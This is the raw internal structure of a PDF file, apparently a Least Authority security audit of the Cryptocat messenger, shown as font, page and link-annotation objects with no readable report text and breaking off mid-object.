Untitled

253 min read Original article ↗
%PDF-1.4 %���� ReportLab Generated PDF document http://www.reportlab.com % 'BasicFonts': class PDFDictionary 1 0 obj % The standard fonts dictionary << /F1 2 0 R /F2 3 0 R /F3 74 0 R /F4 78 0 R /F5 81 0 R /F6 87 0 R /F7 97 0 R >> endobj % 'F1': class PDFType1Font 2 0 obj % Font Helvetica << /BaseFont /Helvetica /Encoding /WinAnsiEncoding /Name /F1 /Subtype /Type1 /Type /Font >> endobj % 'F2': class PDFType1Font 3 0 obj % Font Helvetica-Bold << /BaseFont /Helvetica-Bold /Encoding /WinAnsiEncoding /Name /F2 /Subtype /Type1 /Type /Font >> endobj % 'Annot.NUMBER1': class PDFDictionary 4 0 obj << /A << /S /URI /Type /Action /URI (mailto:nathan@LeastAuthority.com) >> /Border [ 0 0 0 ] /Rect [ 181.7729 689.7736 308.0929 701.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER2': class PDFDictionary 5 0 obj << /A << /S /URI /Type /Action /URI (mailto:zooko@LeastAuthority.com) >> /Border [ 0 0 0 ] /Rect [ 217.5729 671.7736 339.9929 683.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER3': class PDFDictionary 6 0 obj << /A << /S /URI /Type /Action /URI (mailto:daira@LeastAuthority.com) >> /Border [ 0 0 0 ] /Rect [ 186.2229 653.7736 304.1929 665.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER4': class PDFDictionary 7 0 obj << /A << /S /URI /Type /Action /URI (mailto:darius@LeastAuthority.com) >> /Border [ 0 0 0 ] /Rect [ 177.3329 635.7736 300.3029 647.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Page1': class PDFPage 8 0 obj % Page dictionary << /Annots [ 4 0 R 5 0 R 6 0 R 7 0 R ] /Contents 178 0 R /MediaBox [ 0 0 595.2756 841.8898 ] /Parent 177 0 R /Resources << /Font 1 0 R /ProcSet [ /PDF /Text /ImageB /ImageC /ImageI ] >> /Rotate 0 /Trans << >> /Type /Page >> endobj % 'Annot.NUMBER5': class LinkAnnotation 9 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 77 0 R /XYZ 62.69291 156.0236 0 ] /Rect [ 62.69291 723.7736 107.1629 735.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER6': class LinkAnnotation 10 0 obj << /Border [ 0 0 0 ] 
/Contents () /Dest [ 77 0 R /XYZ 62.69291 156.0236 0 ] /Rect [ 527.0227 723.7736 532.5827 735.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER7': class LinkAnnotation 11 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 82 0 R /XYZ 62.69291 741.0236 0 ] /Rect [ 82.69291 705.7736 136.6129 717.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER8': class LinkAnnotation 12 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 82 0 R /XYZ 62.69291 741.0236 0 ] /Rect [ 527.0227 705.7736 532.5827 717.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER9': class LinkAnnotation 13 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 82 0 R /XYZ 62.69291 597.0236 0 ] /Rect [ 82.69291 687.7736 126.0429 699.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER10': class LinkAnnotation 14 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 82 0 R /XYZ 62.69291 597.0236 0 ] /Rect [ 527.0227 687.7736 532.5827 699.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER11': class LinkAnnotation 15 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 82 0 R /XYZ 62.69291 333.0236 0 ] /Rect [ 102.6929 669.7736 218.8529 681.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER12': class LinkAnnotation 16 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 82 0 R /XYZ 62.69291 333.0236 0 ] /Rect [ 527.0227 669.7736 532.5827 681.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER13': class LinkAnnotation 17 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 83 0 R /XYZ 62.69291 765.0236 0 ] /Rect [ 62.69291 651.7736 104.3629 663.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER14': class LinkAnnotation 18 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 83 0 R /XYZ 62.69291 765.0236 0 ] /Rect [ 527.0227 651.7736 532.5827 663.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER15': class LinkAnnotation 19 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 83 0 R /XYZ 62.69291 732.0236 0 ] /Rect [ 82.69291 633.7736 373.3729 645.7736 ] /Subtype 
/Link /Type /Annot >> endobj % 'Annot.NUMBER16': class LinkAnnotation 20 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 83 0 R /XYZ 62.69291 732.0236 0 ] /Rect [ 527.0227 633.7736 532.5827 645.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER17': class LinkAnnotation 21 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 86 0 R /XYZ 62.69291 765.0236 0 ] /Rect [ 82.69291 615.7736 310.0129 627.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER18': class LinkAnnotation 22 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 86 0 R /XYZ 62.69291 765.0236 0 ] /Rect [ 527.0227 615.7736 532.5827 627.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER19': class LinkAnnotation 23 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 88 0 R /XYZ 62.69291 765.0236 0 ] /Rect [ 82.69291 597.7736 209.9729 609.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER20': class LinkAnnotation 24 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 88 0 R /XYZ 62.69291 765.0236 0 ] /Rect [ 527.0227 597.7736 532.5827 609.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER21': class LinkAnnotation 25 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 88 0 R /XYZ 62.69291 471.0236 0 ] /Rect [ 82.69291 579.7736 223.3129 591.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER22': class LinkAnnotation 26 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 88 0 R /XYZ 62.69291 471.0236 0 ] /Rect [ 527.0227 579.7736 532.5827 591.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER23': class LinkAnnotation 27 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 88 0 R /XYZ 62.69291 315.0236 0 ] /Rect [ 102.6929 561.7736 149.9329 573.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER24': class LinkAnnotation 28 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 88 0 R /XYZ 62.69291 315.0236 0 ] /Rect [ 527.0227 561.7736 532.5827 573.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER25': class LinkAnnotation 29 0 obj << /Border [ 0 0 0 ] /Contents 
() /Dest [ 90 0 R /XYZ 62.69291 765.0236 0 ] /Rect [ 102.6929 543.7736 201.0629 555.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER26': class LinkAnnotation 30 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 90 0 R /XYZ 62.69291 765.0236 0 ] /Rect [ 527.0227 543.7736 532.5827 555.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER27': class LinkAnnotation 31 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 90 0 R /XYZ 62.69291 468.8236 0 ] /Rect [ 102.6929 525.7736 254.9729 537.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER28': class LinkAnnotation 32 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 90 0 R /XYZ 62.69291 468.8236 0 ] /Rect [ 527.0227 525.7736 532.5827 537.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER29': class LinkAnnotation 33 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 91 0 R /XYZ 62.69291 765.0236 0 ] /Rect [ 82.69291 507.7736 407.2629 519.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER30': class LinkAnnotation 34 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 91 0 R /XYZ 62.69291 765.0236 0 ] /Rect [ 527.0227 507.7736 532.5827 519.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER31': class LinkAnnotation 35 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 98 0 R /XYZ 62.69291 765.0236 0 ] /Rect [ 82.69291 489.7736 350.5629 501.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER32': class LinkAnnotation 36 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 98 0 R /XYZ 62.69291 765.0236 0 ] /Rect [ 521.4627 489.7736 532.5827 501.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER33': class LinkAnnotation 37 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 99 0 R /XYZ 62.69291 765.0236 0 ] /Rect [ 82.69291 471.7736 456.7429 483.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER34': class LinkAnnotation 38 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 99 0 R /XYZ 62.69291 765.0236 0 ] /Rect [ 82.69291 459.7736 169.9529 471.7736 ] /Subtype /Link 
/Type /Annot >> endobj % 'Annot.NUMBER35': class LinkAnnotation 39 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 99 0 R /XYZ 62.69291 765.0236 0 ] /Rect [ 521.4627 471.7736 532.5827 483.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER36': class LinkAnnotation 40 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 103 0 R /XYZ 62.69291 765.0236 0 ] /Rect [ 82.69291 441.7736 300.5429 453.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER37': class LinkAnnotation 41 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 103 0 R /XYZ 62.69291 765.0236 0 ] /Rect [ 521.4627 441.7736 532.5827 453.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER38': class LinkAnnotation 42 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 106 0 R /XYZ 62.69291 765.0236 0 ] /Rect [ 82.69291 423.7736 339.4729 435.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER39': class LinkAnnotation 43 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 106 0 R /XYZ 62.69291 765.0236 0 ] /Rect [ 521.4627 423.7736 532.5827 435.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER40': class LinkAnnotation 44 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 110 0 R /XYZ 62.69291 765.0236 0 ] /Rect [ 82.69291 405.7736 219.4129 417.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER41': class LinkAnnotation 45 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 110 0 R /XYZ 62.69291 765.0236 0 ] /Rect [ 521.4627 405.7736 532.5827 417.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER42': class LinkAnnotation 46 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 110 0 R /XYZ 62.69291 693.0236 0 ] /Rect [ 102.6929 387.7736 193.8129 399.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER43': class LinkAnnotation 47 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 110 0 R /XYZ 62.69291 693.0236 0 ] /Rect [ 521.4627 387.7736 532.5827 399.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER44': class LinkAnnotation 48 0 obj << /Border [ 0 0 0 ] 
/Contents () /Dest [ 114 0 R /XYZ 62.69291 765.0236 0 ] /Rect [ 62.69291 369.7736 121.5829 381.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER45': class LinkAnnotation 49 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 114 0 R /XYZ 62.69291 765.0236 0 ] /Rect [ 521.4627 369.7736 532.5827 381.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER46': class LinkAnnotation 50 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 114 0 R /XYZ 62.69291 732.0236 0 ] /Rect [ 82.69291 351.7736 289.4429 363.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER47': class LinkAnnotation 51 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 114 0 R /XYZ 62.69291 732.0236 0 ] /Rect [ 521.4627 351.7736 532.5827 363.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER48': class LinkAnnotation 52 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 114 0 R /XYZ 62.69291 660.0236 0 ] /Rect [ 102.6929 333.7736 169.9329 345.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER49': class LinkAnnotation 53 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 114 0 R /XYZ 62.69291 660.0236 0 ] /Rect [ 521.4627 333.7736 532.5827 345.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER50': class LinkAnnotation 54 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 114 0 R /XYZ 62.69291 459.0236 0 ] /Rect [ 102.6929 315.7736 158.8129 327.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER51': class LinkAnnotation 55 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 114 0 R /XYZ 62.69291 459.0236 0 ] /Rect [ 521.4627 315.7736 532.5827 327.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER52': class LinkAnnotation 56 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 114 0 R /XYZ 62.69291 378.0236 0 ] /Rect [ 102.6929 297.7736 239.3929 309.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER53': class LinkAnnotation 57 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 114 0 R /XYZ 62.69291 378.0236 0 ] /Rect [ 521.4627 297.7736 532.5827 309.7736 
] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER54': class LinkAnnotation 58 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 114 0 R /XYZ 62.69291 309.0236 0 ] /Rect [ 102.6929 279.7736 212.1729 291.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER55': class LinkAnnotation 59 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 114 0 R /XYZ 62.69291 309.0236 0 ] /Rect [ 521.4627 279.7736 532.5827 291.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER56': class LinkAnnotation 60 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 114 0 R /XYZ 62.69291 210.0236 0 ] /Rect [ 82.69291 261.7736 209.9729 273.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER57': class LinkAnnotation 61 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 114 0 R /XYZ 62.69291 210.0236 0 ] /Rect [ 521.4627 261.7736 532.5827 273.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER58': class LinkAnnotation 62 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 124 0 R /XYZ 62.69291 765.0236 0 ] /Rect [ 62.69291 243.7736 152.1529 255.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER59': class LinkAnnotation 63 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 124 0 R /XYZ 62.69291 765.0236 0 ] /Rect [ 521.4627 243.7736 532.5827 255.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER60': class LinkAnnotation 64 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 124 0 R /XYZ 62.69291 732.0236 0 ] /Rect [ 82.69291 225.7736 158.2729 237.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER61': class LinkAnnotation 65 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 124 0 R /XYZ 62.69291 732.0236 0 ] /Rect [ 521.4627 225.7736 532.5827 237.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER62': class LinkAnnotation 66 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 133 0 R /XYZ 62.69291 765.0236 0 ] /Rect [ 62.69291 207.7736 323.8629 219.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER63': class LinkAnnotation 67 0 obj << /Border 
[ 0 0 0 ] /Contents () /Dest [ 133 0 R /XYZ 62.69291 765.0236 0 ] /Rect [ 521.4627 207.7736 532.5827 219.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER64': class LinkAnnotation 68 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 139 0 R /XYZ 62.69291 765.0236 0 ] /Rect [ 62.69291 189.7736 170.4729 201.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER65': class LinkAnnotation 69 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 139 0 R /XYZ 62.69291 765.0236 0 ] /Rect [ 521.4627 189.7736 532.5827 201.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER66': class LinkAnnotation 70 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 142 0 R /XYZ 62.69291 765.0236 0 ] /Rect [ 62.69291 171.7736 240.5029 183.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER67': class LinkAnnotation 71 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 142 0 R /XYZ 62.69291 765.0236 0 ] /Rect [ 521.4627 171.7736 532.5827 183.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER68': class PDFDictionary 72 0 obj << /A << /S /URI /Type /Action /URI (https://LeastAuthority.com/) >> /Border [ 0 0 0 ] /Rect [ 83.0379 117.7736 153.1879 129.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER69': class PDFDictionary 73 0 obj << /A << /S /URI /Type /Action /URI (https://crypto.cat/) >> /Border [ 0 0 0 ] /Rect [ 394.8577 117.7736 440.7627 129.7736 ] /Subtype /Link /Type /Annot >> endobj % 'F3': class PDFType1Font 74 0 obj % Font Helvetica-Oblique << /BaseFont /Helvetica-Oblique /Encoding /WinAnsiEncoding /Name /F3 /Subtype /Type1 /Type /Font >> endobj % 'Annot.NUMBER70': class PDFDictionary 75 0 obj << /A << /S /URI /Type /Action /URI (https://www.opentechfund.org/) >> /Border [ 0 0 0 ] /Rect [ 203.7501 105.7736 312.7937 117.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER71': class PDFDictionary 76 0 obj << /A << /S /URI /Type /Action /URI (https://crypto.cat/) >> /Border [ 0 0 0 ] /Rect [ 320.6255 105.7736 368.4673 117.7736 ] /Subtype 
/Link /Type /Annot >> endobj % 'Page2': class PDFPage 77 0 obj % Page dictionary << /Annots [ 9 0 R 10 0 R 11 0 R 12 0 R 13 0 R 14 0 R 15 0 R 16 0 R 17 0 R 18 0 R 19 0 R 20 0 R 21 0 R 22 0 R 23 0 R 24 0 R 25 0 R 26 0 R 27 0 R 28 0 R 29 0 R 30 0 R 31 0 R 32 0 R 33 0 R 34 0 R 35 0 R 36 0 R 37 0 R 38 0 R 39 0 R 40 0 R 41 0 R 42 0 R 43 0 R 44 0 R 45 0 R 46 0 R 47 0 R 48 0 R 49 0 R 50 0 R 51 0 R 52 0 R 53 0 R 54 0 R 55 0 R 56 0 R 57 0 R 58 0 R 59 0 R 60 0 R 61 0 R 62 0 R 63 0 R 64 0 R 65 0 R 66 0 R 67 0 R 68 0 R 69 0 R 70 0 R 71 0 R 72 0 R 73 0 R 75 0 R 76 0 R ] /Contents 179 0 R /MediaBox [ 0 0 595.2756 841.8898 ] /Parent 177 0 R /Resources << /Font 1 0 R /ProcSet [ /PDF /Text /ImageB /ImageC /ImageI ] >> /Rotate 0 /Trans << >> /Type /Page >> endobj % 'F4': class PDFType1Font 78 0 obj % Font Courier << /BaseFont /Courier /Encoding /WinAnsiEncoding /Name /F4 /Subtype /Type1 /Type /Font >> endobj % 'Annot.NUMBER72': class LinkAnnotation 79 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 114 0 R /XYZ 62.69291 768.5236 0 ] /Rect [ 328.9129 363.7736 386.7029 375.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER73': class LinkAnnotation 80 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 139 0 R /XYZ 62.69291 768.5236 0 ] /Rect [ 62.69291 345.7736 164.9629 357.7736 ] /Subtype /Link /Type /Annot >> endobj % 'F5': class PDFType1Font 81 0 obj % Font Helvetica-BoldOblique << /BaseFont /Helvetica-BoldOblique /Encoding /WinAnsiEncoding /Name /F5 /Subtype /Type1 /Type /Font >> endobj % 'Page3': class PDFPage 82 0 obj % Page dictionary << /Annots [ 79 0 R 80 0 R ] /Contents 180 0 R /MediaBox [ 0 0 595.2756 841.8898 ] /Parent 177 0 R /Resources << /Font 1 0 R /ProcSet [ /PDF /Text /ImageB /ImageC /ImageI ] >> /Rotate 0 /Trans << >> /Type /Page >> endobj % 'Page4': class PDFPage 83 0 obj % Page dictionary << /Contents 181 0 R /MediaBox [ 0 0 595.2756 841.8898 ] /Parent 177 0 R /Resources << /Font 1 0 R /ProcSet [ /PDF /Text /ImageB /ImageC /ImageI ] >> /Rotate 0 /Trans << >> 
/Type /Page >> endobj % 'Annot.NUMBER74': class PDFDictionary 84 0 obj << /A << /S /URI /Type /Action /URI (https://en.wikipedia.org/wiki/Running%20key%20cipher) >> /Border [ 0 0 0 ] /Rect [ 230.2129 449.3736 312.4629 461.3736 ] /Subtype /Link /Type /Annot >> endobj % 'Page5': class PDFPage 85 0 obj % Page dictionary << /Annots [ 84 0 R ] /Contents 182 0 R /MediaBox [ 0 0 595.2756 841.8898 ] /Parent 177 0 R /Resources << /Font 1 0 R /ProcSet [ /PDF /Text /ImageB /ImageC /ImageI ] >> /Rotate 0 /Trans << >> /Type /Page >> endobj % 'Page6': class PDFPage 86 0 obj % Page dictionary << /Contents 183 0 R /MediaBox [ 0 0 595.2756 841.8898 ] /Parent 177 0 R /Resources << /Font 1 0 R /ProcSet [ /PDF /Text /ImageB /ImageC /ImageI ] >> /Rotate 0 /Trans << >> /Type /Page >> endobj % 'F6': class PDFType1Font 87 0 obj % Font Symbol << /BaseFont /Symbol /Encoding /SymbolEncoding /Name /F6 /Subtype /Type1 /Type /Font >> endobj % 'Page7': class PDFPage 88 0 obj % Page dictionary << /Contents 184 0 R /MediaBox [ 0 0 595.2756 841.8898 ] /Parent 177 0 R /Resources << /Font 1 0 R /ProcSet [ /PDF /Text /ImageB /ImageC /ImageI ] >> /Rotate 0 /Trans << >> /Type /Page >> endobj % 'Annot.NUMBER75': class PDFDictionary 89 0 obj << /A << /S /URI /Type /Action /URI (https://tools.ietf.org/html/rfc5869) >> /Border [ 0 0 0 ] /Rect [ 468.8538 690.7736 496.0738 702.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Page8': class PDFPage 90 0 obj % Page dictionary << /Annots [ 89 0 R ] /Contents 185 0 R /MediaBox [ 0 0 595.2756 841.8898 ] /Parent 177 0 R /Resources << /Font 1 0 R /ProcSet [ /PDF /Text /ImageB /ImageC /ImageI ] >> /Rotate 0 /Trans << >> /Type /Page >> endobj % 'Page9': class PDFPage 91 0 obj % Page dictionary << /Contents 186 0 R /MediaBox [ 0 0 595.2756 841.8898 ] /Parent 177 0 R /Resources << /Font 1 0 R /ProcSet [ /PDF /Text /ImageB /ImageC /ImageI ] >> /Rotate 0 /Trans << >> /Type /Page >> endobj % 'Annot.NUMBER76': class PDFDictionary 92 0 obj << /A << /S /URI /Type /Action /URI 
(https://api.jquery.com/replacewith/) >> /Border [ 0 0 0 ] /Rect [ 236.7169 753.7736 377.2122 765.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER77': class PDFDictionary 93 0 obj << /A << /S /URI /Type /Action /URI (https://github.com/cryptocat/cryptocat/blob/master/CHANGELOG.md#cryptocat-2116) >> /Border [ 0 0 0 ] /Rect [ 111.5929 591.7736 144.3929 603.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER78': class PDFDictionary 94 0 obj << /A << /S /URI /Type /Action /URI (https://github.com/strophe/strophejs/issues/35) >> /Border [ 0 0 0 ] /Rect [ 103.1689 525.7736 185.3249 537.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Page10': class PDFPage 95 0 obj % Page dictionary << /Annots [ 92 0 R 93 0 R 94 0 R ] /Contents 187 0 R /MediaBox [ 0 0 595.2756 841.8898 ] /Parent 177 0 R /Resources << /Font 1 0 R /ProcSet [ /PDF /Text /ImageB /ImageC /ImageI ] >> /Rotate 0 /Trans << >> /Type /Page >> endobj % 'Annot.NUMBER79': class PDFDictionary 96 0 obj << /A << /S /URI /Type /Action /URI (http://xmpp.org/extensions/xep-0096.html) >> /Border [ 0 0 0 ] /Rect [ 282.6378 711.7736 351.369 723.7736 ] /Subtype /Link /Type /Annot >> endobj % 'F7': class PDFType1Font 97 0 obj % Font Courier-Bold << /BaseFont /Courier-Bold /Encoding /WinAnsiEncoding /Name /F7 /Subtype /Type1 /Type /Font >> endobj % 'Page11': class PDFPage 98 0 obj % Page dictionary << /Annots [ 96 0 R ] /Contents 188 0 R /MediaBox [ 0 0 595.2756 841.8898 ] /Parent 177 0 R /Resources << /Font 1 0 R /ProcSet [ /PDF /Text /ImageB /ImageC /ImageI ] >> /Rotate 0 /Trans << >> /Type /Page >> endobj % 'Page12': class PDFPage 99 0 obj % Page dictionary << /Contents 189 0 R /MediaBox [ 0 0 595.2756 841.8898 ] /Parent 177 0 R /Resources << /Font 1 0 R /ProcSet [ /PDF /Text /ImageB /ImageC /ImageI ] >> /Rotate 0 /Trans << >> /Type /Page >> endobj % 'Annot.NUMBER80': class PDFDictionary 100 0 obj << /A << /S /URI /Type /Action /URI 
(http://googlesystem.blogspot.com/2013/04/anonymous-animals-in-google-drive.html) >> /Border [ 0 0 0 ] /Rect [ 480.8927 654.7736 531.1145 666.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER81': class PDFDictionary 101 0 obj << /A << /S /URI /Type /Action /URI (http://googlesystem.blogspot.com/2013/04/anonymous-animals-in-google-drive.html) >> /Border [ 0 0 0 ] /Rect [ 85.69291 642.7736 195.1329 654.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Page13': class PDFPage 102 0 obj % Page dictionary << /Annots [ 100 0 R 101 0 R ] /Contents 190 0 R /MediaBox [ 0 0 595.2756 841.8898 ] /Parent 177 0 R /Resources << /Font 1 0 R /ProcSet [ /PDF /Text /ImageB /ImageC /ImageI ] >> /Rotate 0 /Trans << >> /Type /Page >> endobj % 'Page14': class PDFPage 103 0 obj % Page dictionary << /Contents 191 0 R /MediaBox [ 0 0 595.2756 841.8898 ] /Parent 177 0 R /Resources << /Font 1 0 R /ProcSet [ /PDF /Text /ImageB /ImageC /ImageI ] >> /Rotate 0 /Trans << >> /Type /Page >> endobj % 'Annot.NUMBER82': class LinkAnnotation 104 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 142 0 R /XYZ 62.69291 768.5236 0 ] /Rect [ 477.2606 423.7736 531.7306 435.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER83': class LinkAnnotation 105 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 142 0 R /XYZ 62.69291 768.5236 0 ] /Rect [ 62.69291 411.7736 171.0729 423.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Page15': class PDFPage 106 0 obj % Page dictionary << /Annots [ 104 0 R 105 0 R ] /Contents 192 0 R /MediaBox [ 0 0 595.2756 841.8898 ] /Parent 177 0 R /Resources << /Font 1 0 R /ProcSet [ /PDF /Text /ImageB /ImageC /ImageI ] >> /Rotate 0 /Trans << >> /Type /Page >> endobj % 'Annot.NUMBER84': class LinkAnnotation 107 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 142 0 R /XYZ 62.69291 768.5236 0 ] /Rect [ 441.7456 612.7736 530.7941 624.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER85': class LinkAnnotation 108 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 142 0 R 
